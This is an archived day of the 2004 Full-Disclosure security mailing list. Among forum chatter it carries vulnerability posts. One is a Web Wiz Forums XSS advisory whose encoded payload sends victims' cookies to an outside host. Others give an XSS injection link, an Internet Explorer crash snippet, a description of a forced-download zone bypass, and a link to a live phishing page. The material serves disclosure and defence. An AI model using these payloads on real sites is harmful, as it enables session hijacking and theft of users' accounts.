NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Full-Disclosure> 2004-06

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

application/octet-stream attachment: Document.com

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] linux kernel local crash seen on slashdot

From: Dave Monnier, IT Security Office, Indiana University (dmonnieriu.edu)
Date: Tue Jun 15 2004 - 08:23:58 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Stefan SF wrote:
> Not really,
>
> but you could activate PaX which prevents the exploit!
>
> ....hth...
>
> Stefan

The vulnerability mentioned in the topic affects PaX enabled kernels as
well.

Cheers,
- -Dave

- --
| Dave Monnier - dmonnieriu.edu - http://php.indiana.edu/~dmonnier/ |
| Lead Security Engineer, Information Technology Security Office |
| Office of the VP for Information Technology, Indiana University |
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFAzvhuBIf6jlONJjIRAlzTAKCa0Vv6pPTkKZ2rDJg3CngXblfqUgCgwZG9
WshZ1tnkYP+Fz0yJhf2DwVw=
=3/bZ
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!

From: Cory Donnelly (coryonryou.com)
Date: Tue Jun 15 2004 - 07:25:59 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Aditya, ALD [Aditya Lalit Deshmukh] wrote:

> First of all this might be a social engg. attempt to find your
> antivirus versions and if the allow passing of malicious code thr.. so
> please santise your data before sending to the list

Who, Bipin? Are you kidding? He's as harmless as a puppy wrapped in
bubble-wrap.

C
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)

iD8DBQFAzurXokBdAgPGOhURAsP0AKDwVqDSbGjUD3AnMdiGSLX5D4mOcgCg+LQ5
QVIc7ScXhq79iLqcYwPC1tI=
=OAx6
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Akamai

From: Niek Baakman (niekbaakmanhome.nl)
Date: Tue Jun 15 2004 - 08:58:27 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi list,

akamai disappeared from the internet about an hour ago.
(all their dns servers are dead, hence many companies that
use akamai are unreachable: microsoft.com/liveupdate.symantec.com
apple/some search engines)

Does anyone know if it is security-related (ddos, something else).

Regards,

Niek

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Yahoo upgraded all accounts to 100MB

From: Syed Imran Ali (manipetoyahoo.co.uk)
Date: Tue Jun 15 2004 - 08:57:30 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hiya,

It is nice to see my inbox today, having 100MB or storage space, 84%
remaining. Yahoo now allows up to 10MB attachment too.... I am not sure
about .co.uk is still allowing POP or not with 100MB, as it was with 6MB.

Regards,

S. Imran Ali

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] antivirus and spyware scanning

From: Lee Leahu (leericis.com)
Date: Tue Jun 15 2004 - 09:45:33 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello Everyone,

I recently came across a linux based live-cd designed for virus scanning, disaster recover, network analysis, etc.

http://www.inside-security.de/insert_en.html

I think it is very useful to scan a windows machine from viruses while having that machine booted to linux. This pretty much ensures that you will find all the virii on that system.

Does anyone know of a spyware scanner that can also work from within Linux? I dis-like the idea of having to boot to windows just to scan the box for spyware. One could argue that the harddrive could be put into another machine and scanned there, but what if your in an environment where that is just not possible (making housecalls, no unused machine, etc)?

Also, if you know of a better solution that this, I am always interested.

Thanks

--
Lee Leahu RICIS, Inc.
Internet Technology Specialist 866-RICIS-77 Toll Free Voice (US)
leericis.com 708-444-2690 Voice (International)
http://www.ricis.com/ 866-99-RICIS Toll Free Fax (US)
708-444-2697 Fax (International)

RICIS, Inc. is a member of the Public Safety Alliance Group

This email and any attachments that are included in it have been scanned
for malicious or inappropriate content and are believed to be safe.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] MAGIC XSS INTO THE DNS: coelacanth

http-equivexcite.com
Date: Tue Jun 15 2004 - 10:19:21 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Tuesday, June 12, 2004

The following courtesy of 'bitlance winter' adds an entirely new
dimension to the matter and also suggest some additional
peculiarities at play:

<a href='http://"><script>alert()<%
2Fscript>.e-gold.com'>foo</a>

these will inject arbitrary html and script into the site in the
context of the 'intranet zone', which means one no longer needs
to go out and setup a site with the dns issue, all one needs to
do is locate a functioning site, include their code into a
suitable url, either direct the target via that or place an
iframe elsewhere pointing to it.

Still unclear how or why this can be interpreted into the site
or through the browser.

credit: 'bitlance winter'

End Call

--
http://www.malware.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB

From: William Warren (hescominsoonemmanuelcomputerconsulting.com)
Date: Tue Jun 15 2004 - 10:25:00 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

hrmm my yahoo account still shows 4.0 megs..do you have a paid account?

Syed Imran Ali wrote:

> Hiya,
>
> It is nice to see my inbox today, having 100MB or storage space, 84%
> remaining. Yahoo now allows up to 10MB attachment too.... I am not sure
> about .co.uk is still allowing POP or not with 100MB, as it was with 6MB.
>
> Regards,
>
> S. Imran Ali
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
My "Foundation" verse:
Isa 54:17 No weapon that is formed against thee shall prosper; and
every tongue that shall rise against thee in judgment thou shalt
condemn. This is the heritage of the servants of the LORD, and their
righteousness is of me, saith the LORD.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Dull-Disclosure

From: Eric Paynter (ericarcticbears.com)
Date: Tue Jun 15 2004 - 11:01:02 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Mon, June 14, 2004 3:30 pm, Curt Purdy said:
> You think infosec.volubis.com was dissing us?
[...]
> Quote:
> has been posted onto a dull disclosure mailing list.

f and d are right next to each other on a querty keyboard. Perhaps it was
just a typo. :-?

-Eric

--
arctic bears - affordable email and name services yourdomain.com
http://www.arcticbears.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] antivirus and spyware scanning

From: Dave King (davefddavewking.com)
Date: Tue Jun 15 2004 - 10:41:23 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I've looked at several bootable Linux cd's and haven't found one to
remove Window's spyware. BartPE ( http://www.nu2.nu/pebuilder/ ) is a
Windows XP/2003 based bootable CD that will allow you to run Adaware.
The one limitation seems to be that it won't scan the registry on the
Windows installation on the hard drive. If you haven't checked it out,
BartPE is really a cool project that basically lets you master your own
cd to your own liking. It has a pretty large comunity backing and you
who make all sorts of addins. You can, for example, add virus scanning
to your BartPE cd as well.

You may also be able to get Adaware, or some similar program, to run
using WINE on a Knoppix based distro like Auditor Security Collection or
Knoppix-STD.

Good Luck,
Dave King
http://www.thesecure.net

Lee Leahu wrote:

>Hello Everyone,
>
>I recently came across a linux based live-cd designed for virus scanning, disaster recover, network analysis, etc.
>
>http://www.inside-security.de/insert_en.html
>
>I think it is very useful to scan a windows machine from viruses while having that machine booted to linux. This pretty much ensures that you will find all the virii on that system.
>
>Does anyone know of a spyware scanner that can also work from within Linux? I dis-like the idea of having to boot to windows just to scan the box for spyware. One could argue that the harddrive could be put into another machine and scanned there, but what if your in an environment where that is just not possible (making housecalls, no unused machine, etc)?
>
>Also, if you know of a better solution that this, I am always interested.
>
>Thanks
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] US Bank scam

From: David Lederman (delphi4proyahoo.com)
Date: Tue Jun 15 2004 - 11:29:50 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is the best phishing scam I've seen yet:
http://www.bis1bp.com/a12/index.html

I have Windows Server 2003 fully patched and this works. The program fakes an address bar so this
would pass through most people's safety check, after all the address bar clearly has the correct
address.

There are bugs in the code, for example, all your Internet Explorer windows will now have this
address, but again for most people would only have one window open.

__________________________________
Do you Yahoo!?
Yahoo! Mail is new and improved - Check it out!
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB

From: Ron DuFresne (dufresnewinternet.com)
Date: Tue Jun 15 2004 - 11:42:10 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The real questions fellows is though, what does any of this have to do
with security, and who cares how much storage space your particular ISP or
e-mail provider supplies?

Thanks,

Ron DuFresne

On Tue, 15 Jun 2004, William Warren wrote:

> hrmm my yahoo account still shows 4.0 megs..do you have a paid account?
>
>
> Syed Imran Ali wrote:
>
> > Hiya,
> >
> > It is nice to see my inbox today, having 100MB or storage space, 84%
> > remaining. Yahoo now allows up to 10MB attachment too.... I am not sure
> > about .co.uk is still allowing POP or not with 100MB, as it was with 6MB.
> >
> > Regards,
> >
> > S. Imran Ali
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
> --
> My "Foundation" verse:
> Isa 54:17 No weapon that is formed against thee shall prosper; and
> every tongue that shall rise against thee in judgment thou shalt
> condemn. This is the heritage of the servants of the LORD, and their
> righteousness is of me, saith the LORD.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1707 - 14 msgs (This message is automatically generated by Groupwise. Apologies for not being able to attend to your)

From: Chin Cheng Baey (Baeydbs.com)
Date: Tue Jun 15 2004 - 11:26:07 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This message is automatically generated by Groupwise. Apologies for not being able to attend to your email. I'm away and will be back on 17 June. During this period, I will not have access to email.

If the matter is urgent, please contact the following:

Kim Chwee 6878-2640
Joke Fong 6878-2629.

Have a great day.

CONFIDENTIAL NOTE: The information contained in this email is intended only
for the use of the individual or entity named above and may contain
information that is privileged, confidential and exempt from disclosure
under applicable law. If the reader of this message is not the intended
recipient, you are hereby notified that any dissemination, distribution or
copying of this communication is strictly prohibited. If you have received
this message in error, please immediately notify the sender and delete the
mail. Thank you.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] RE: Internet Explorer Remote Null Pointer Crash(mshtml.dll)

From: Thor Larholm (thorpivx.com)
Date: Tue Jun 15 2004 - 12:02:28 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Manually right-clicking and selecting "Save target as" invokes the
download functionality. This can also be automatically triggered by
redirecting with a META tag to a server script that sets Content-Type
and Content-Disposition headers to an unknown MIME-type which causes the
"Open/Save As" dialog box to be triggered during which time IE
automatically tries to initiate the download and create the appropriate
files in the TIF (Temporary Internet Files), just like the "Save target
as" functionality does.

IE automatically initiates the download of any file with an unknown
MIME-type and starts storing this file in the TIF, before the user has
selected whether to Open, Save or Cancel the download. If the user
cancels, the file is deleted. This has already been used to plant
arbitrary files in predictable locations and leads to a race condition
where you can cross the security zone boundaries using other
vulnerabilities in the timeframe between the download is forcefully
initiated to the time where the user cancels the download.

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thorpivx.com
Stock symbol: (PIVX)
Phone: +1 (949) 231-8496
PGP: 0x5A276569
6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines a new genre in Desktop Security: Proactive Threat
Mitigation.
<http://www.pivx.com/qwikfix>

-----Original Message-----
From: Berend-Jan Wever [mailto:SkyLinededup.tudelft.nl]
Sent: Monday, June 14, 2004 6:34 PM
To: full-disclosurelists.netsys.com; vulnwatchvulnwatch.org
Subject: Re: [Full-Disclosure] Internet Explorer Remote Null Pointer
Crash(mshtml.dll)

Doesn't look like a null pointer to me, especially since it crashes
while reading 800c0005... I think it's a format string vulnerability,
causing ntdll.RtlFormatMessage to call ntdll._snwprintf with your href.
Might be exploitable, I'll have a look...

Cheers,
SkyLined
----- Original Message -----
From: "Rafel Ivgi, The-Insider" <theinsider012.net.il>
To: "vulnwatch" <vulnwatchvulnwatch.org>
Sent: Monday, June 14, 2004 23:20
Subject: [Full-Disclosure] Internet Explorer Remote Null Pointer
Crash(mshtml.dll)

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~
>
> Application: Internet Explorer
> Vendors: http://www.microsoft.com
> Versions: 6.0.2800.1106.xpclnt_qfe.021108-2107
> Patched With: SP1;Q832894;Q330994;Q837009;Q831167;
> ModName: mshtml.dll
> ModVer: 6.0.2734.1600
> Platforms: Windows
> Bug: Remote/Local Null Pointer Crash
> Exploitation: Remote with browser
> Date: 14 Jun 2004
> Author: Rafel Ivgi, The-Insider
> e-mail: the_insidermail.com
> web: http://theinsider.deep-ice.com
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~
>
> 1) Introduction
> 2) Bugs
> 3) The Code
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~
>
> ===============
> 1) Introduction
> ===============
>
> Internet Explorer is currently the most common internet browser in the

> world. It comes by default with every windows operating system.
> Therefore any vulnerability
> concerning it is an highly important issue.
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~
>
> ======
> 2) Bug
> ======
>
> Upon clicking "Save As" on a link with double colon --> "::" and
> a left curly bracket --> "{"
> then
> Internet Explorer Will Crash.
>
> AppName: iexplore.exe AppVer: 6.0.2600.0 ModName: ntdll.dll
> ModVer: 5.1.2600.114 Offset: 00056074
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~
>
> ===========
> 3) The Code
> ===========
>
> Paste into an htm/html file:
> <center><a href=::%7b>Right Click aOn Me And Click "Save Target
> As"</a>
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~
>
> ---
> Rafel Ivgi, The-Insider
> http://theinsider.deep-ice.com
>
> "Scripts and Codes will make me D.O.S , but they will never HACK me."
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] antivirus and spyware scanning

From: Harlan Carvey (keydet89yahoo.com)
Date: Tue Jun 15 2004 - 11:43:08 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> I think it is very useful to scan a windows machine
> from viruses while having that machine booted to
> linux. This pretty much ensures that you will find
> all the virii on that system.

Not necessarily. You'll have to update the virus
signatures on your CD distribution prior to scanning,
and that doesn't guarantee complete coverage, either.

> Does anyone know of a spyware scanner that can also
> work from within Linux? I dis-like the idea of
> having to boot to windows just to scan the box for
> spyware. One could argue that the harddrive could
> be put into another machine and scanned there, but
> what if your in an environment where that is just
> not possible (making housecalls, no unused machine,
> etc)?
>
> Also, if you know of a better solution that this, I
> am always interested.

Better solution than what? I'm not really clear on
what you're trying to do...you seem to have Windows
machines that you're interested in scanning for
viruses and spyware...why not simply use Windows apps?
That way, you wouldn't have to boot to another os, or
remove the hard drive at all...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB

From: Joseph Peterson (josephimagescape.com)
Date: Tue Jun 15 2004 - 11:35:29 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Perhaps it is for users who have been with Yahoo for a really long time? I
just checked and mine has been upgraded to 100Mb.

Actually, I wasn't too worried about it because for several months now
their quota on my account has been broken! It always said 92% of capacity
even when I knew I had well over the allotted quota.

-joe

On Tue, 15 Jun 2004, William Warren wrote:

> hrmm my yahoo account still shows 4.0 megs..do you have a paid account?
>
>
> Syed Imran Ali wrote:
>
>> Hiya,
>>
>> It is nice to see my inbox today, having 100MB or storage space, 84%
>> remaining. Yahoo now allows up to 10MB attachment too.... I am not sure
>> about .co.uk is still allowing POP or not with 100MB, as it was with 6MB.
>>
>> Regards,
>>
>> S. Imran Ali
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
>
> --
> My "Foundation" verse:
> Isa 54:17 No weapon that is formed against thee shall prosper; and every
> tongue that shall rise against thee in judgment thou shalt condemn. This is
> the heritage of the servants of the LORD, and their righteousness is of me,
> saith the LORD.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Web Wiz Forums Registration Rules XSS Vulnerability

From: Ferruh Mavituna (ferruhmavituna.com)
Date: Tue Jun 15 2004 - 12:25:37 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

------------------------------------------------------
WEB WIZ FORUMS REGISTRATION RULES XSS VULNERABILITY
------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?528

XSS / Cross Site Scripting attack allows an attacker to hijack other
users/administrators account.

------------------------------------------------------
ABOUT WEB WIZ FORUMS;
------------------------------------------------------
Web Wiz Forums, the free award winning ASP bulletin board system software,
can add value to almost any web site.

Whether you are building a small interactive community with 10 people or
over 100,000 strong customer support forum, this fast, scalable, bulletin
board engine can manage your community

URL & Demo & Source Code Download ;
http://www.webwizguide.info/web_wiz_forums/

------------------------------------------------------
VULNERABLE;
------------------------------------------------------
Web Wiz Forums Version 7.8 [possibly lower versions]

------------------------------------------------------
NOT VULNERABLE;
------------------------------------------------------
Web Wiz Forums Version 7.9

------------------------------------------------------
PROBLEM;
------------------------------------------------------
- Page
registration_rules.asp (Parameter : FID)

- Test;
registration_rules.asp?FID=%22%3E%3Cscript%3Ealert%28%27Vulnerable%2520%21%2
7%29%3C%2Fscript%3E

- Possible Exploit Pattern;
- This sample sends cookie to victim URL [in sample
http://ferruh.mavituna.com/xss/]
registration_rules.asp?FID=%22%3E%3Cimg+width%3D0+height%3D0+src%3D%22javasc
ript%3Adocument%2Eimages%5B0%5D%2Esrc%3D%27http%3A%2F%2Fferruh%2Emavituna%2E
com%2Fxss%2F%3F%27%2Bdocument%2Ecookie%22%3E

------------------------------------------------------
HOW TO PATCH [provided by vendor];
------------------------------------------------------
Download http://www.zap2.me.uk/7.7a_and_7.8_to_7.9_patch_files.zip
Version 7.9 has been released to deal with this issue.
Change line 65 of the file registration_rules.asp that reads:-

intForumID = Request.QueryString("FID")

To the following:-

If isNumeric(Request.QueryString("FID")) Then
intForumID = CInt(Request.QueryString("FID"))
Else
intForumID = 0
End If

-----------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 14.06.2004
Vendor Informed : 15.06.2004
Published : 15.06.2004

------------------------------------------------------
Vendor Status;
------------------------------------------------------
Quickly answered & fixed.

Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com

PGPKey : http://ferruh.mavituna.com/PGPKey.asc

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] Akamai

From: Chris Carlson (chriscompucounts.com)
Date: Tue Jun 15 2004 - 12:46:07 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I've just been told that it was a DoS. No details.

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> Niek Baakman
> Sent: Tuesday, June 15, 2004 09:58
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] Akamai
>
> Hi list,
>
> akamai disappeared from the internet about an hour ago.
> (all their dns servers are dead, hence many companies that
> use akamai are unreachable: microsoft.com/liveupdate.symantec.com
> apple/some search engines)
>
> Does anyone know if it is security-related (ddos, something else).
>
> Regards,
>
> Niek
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] US Bank scam

From: Eric LeBlanc (inoukigt.net)
Date: Tue Jun 15 2004 - 12:58:39 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, 15 Jun 2004, David Lederman wrote:

> This is the best phishing scam I've seen yet:
> http://www.bis1bp.com/a12/index.html
>
> I have Windows Server 2003 fully patched and this works. The program fakes an address bar so this
> would pass through most people's safety check, after all the address bar clearly has the correct
> address.
>
> There are bugs in the code, for example, all your Internet Explorer windows will now have this
> address, but again for most people would only have one window open.
>

If you have google's toolbar or something similar, it will overwrite this
toolbar and not the address bar.

But, I must admit that this thing is ingenious !

E.
--
Eric LeBlanc
inoukigt.net
--------------------------------------------------
UNIX is user friendly.
It's just selective about who its friends are.
==================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] antivirus and spyware scanning

From: Kevin Ponds (kpondsgmail.com)
Date: Tue Jun 15 2004 - 13:08:17 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Logically speaking, all of a viruses kinetic countermeasures to
detection can be negated by scanning for the virus whilst the drive is
not mounted.

I think the original poster wanted to take more of a forensic approach
to virus removal, in this way the antivirus software cannot be
hijacked itself.

A good implementation would either download the definitions from the
internet right after the CD boots (this could be a problem because of
oddball NICs and linux drivers), or alternatively from a
floppy/USB-key.

The only problems that I see with it are that "at rest" detection
methodology does not work for certain viral stealth manuvers, such as
polymorphic engines and (in the near future) cryptovirology*.
Run-time analysis is needed for viruses that obfuscate their stored
code.

*however, we have to get our users to stop downloading attachments and
to start patching before the virus writers have any incentive to be
innovative and use things like polymorphic engines and cryptovirology.

ponds

On Tue, 15 Jun 2004 09:43:08 -0700 (PDT), Harlan Carvey
<keydet89yahoo.com> wrote:
>
>
> > I think it is very useful to scan a windows machine
> > from viruses while having that machine booted to
> > linux. This pretty much ensures that you will find
> > all the virii on that system.
>
> Not necessarily. You'll have to update the virus
> signatures on your CD distribution prior to scanning,
> and that doesn't guarantee complete coverage, either.
>
>
> > Does anyone know of a spyware scanner that can also
> > work from within Linux? I dis-like the idea of
> > having to boot to windows just to scan the box for
> > spyware. One could argue that the harddrive could
> > be put into another machine and scanned there, but
> > what if your in an environment where that is just
> > not possible (making housecalls, no unused machine,
> > etc)?
> >
> > Also, if you know of a better solution that this, I
> > am always interested.
>
> Better solution than what? I'm not really clear on
> what you're trying to do...you seem to have Windows
> machines that you're interested in scanning for
> viruses and spyware...why not simply use Windows apps?
> That way, you wouldn't have to boot to another os, or
> remove the hard drive at all...
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200406-10 ] Gallery: Privilege escalation vulnerability

From: Thierry Carrez (koongentoo.org)
Date: Tue Jun 15 2004 - 14:14:20 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Gallery: Privilege escalation vulnerability
      Date: June 15, 2004
      Bugs: #52798
        ID: 200406-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

There is a vulnerability in the Gallery photo album software which may
allow an attacker to gain administrator privileges within Gallery.

Background
==========

Gallery is a web application written in PHP which is used to organize
and publish photo albums. It allows multiple users to build and
maintain their own albums. It also supports the mirroring of images on
other servers.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 app-misc/gallery <= 1.4.3_p1 >= 1.4.3_p2

Description
===========

There is a vulnerability in the Gallery photo album software which may
allow an attacker to gain administrator privileges within Gallery. A
Gallery administrator has full access to all albums and photos on the
server, thus attackers may add or delete photos at will.

Impact
======

Attackers may gain full access to all Gallery albums. There is no risk
to the webserver itself, or the server on which it runs.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.

Resolution
==========

All users should upgrade to the latest available version of Gallery.

# emerge sync

# emerge -pv ">=app-misc/gallery-1.4.3_p2"
# emerge ">=app-misc/gallery-1.4.3_p2"

References
==========

[ 1 ] Gallery Announcement

http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=123&mode=thread&order=0&thold=0

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200406-10.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAz0qMvcL1obalX08RAmuoAKCKcyWXNtt+mdgtX26R9l96V8yE4QCfVFQG
9s9GiyiY83X/VHcx2Kc+mQQ=
=+z9+
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Administrivia: Classical Rant

From: Len Rose (lennetsys.com)
Date: Tue Jun 15 2004 - 13:52:11 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

ATTENTION LAMERS

Speaking for myself only, something has to be done
about the quality of the information, and the standards
of netiquette on this list.

We all don't need to see mindlesS banter, and other noise
spewing back and forth. If you can, please try to not post
this spewage to the list, but instead send mail to each other
(after carefully cutting and pasting on your windows desktop)

If you must send it to the list it must be in terms of
technical content, whether it is of a real security issue
and not if Yahoo will increase your disk space or what slashdorks
posted about something that was known since 2 months ago.

I use the word technical loosely as in my mind, anything
security related is inherently technical even if it/is not
actually dealing with code or networks or systems.

I'm very sick of seeing the amount of lame crap on this list,
and I imagine a great deal of others are too.

Thanks for listening.

  PS Unlike other "reputable" lists, we try not to censor
